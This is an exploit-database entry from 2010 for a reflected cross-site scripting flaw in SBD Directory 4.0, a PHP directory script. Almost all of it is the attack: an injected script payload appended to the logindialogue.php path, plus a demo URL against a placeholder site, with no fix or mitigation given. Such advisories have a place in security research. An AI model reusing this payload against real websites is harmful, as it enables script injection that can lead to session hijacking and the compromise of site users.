SBD Directory 4.0 (XSS) Cross Site Scripting Vulnerability

2010-02-27T00:00:00
ID 1337DAY-ID-11112
Type zdt
Reporter Crux
Modified 2010-02-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
SBD Directory 4.0 (XSS) Cross Site Scripting Vulnerability
==========================================================

==============================================================================
    [~] SBD Directory 4.0 (XSS) Cross Site Scripting Vulnerability
==============================================================================
    [+] My home          [ http://hack-tech.com ]
    [+] Date Submitted:  [ January 11 2010 ]
    [+] Founder:         [ Crux ]
    [+] Vendor:          [ SBD Directory Software | A PHP Directory Script ]
    [+] Version:         [ 4.0 ]
    [+] Greetz:          [ HT Team, All maldivians and my love ]
    [+] Dork:            [ NO NO NO! ]


[ EXPLOIT ]

[Path]/editors/logindialogue.php/>"><ScRiPt>alert(429138855268)</ScRiPt>


[ DEMO ]

http://site.com/sbd/editors/logindialogue.php/>"><ScRiPt>alert(429138855268)</ScRiPt>

==============================================================================



#  0day.today [2018-03-01]  #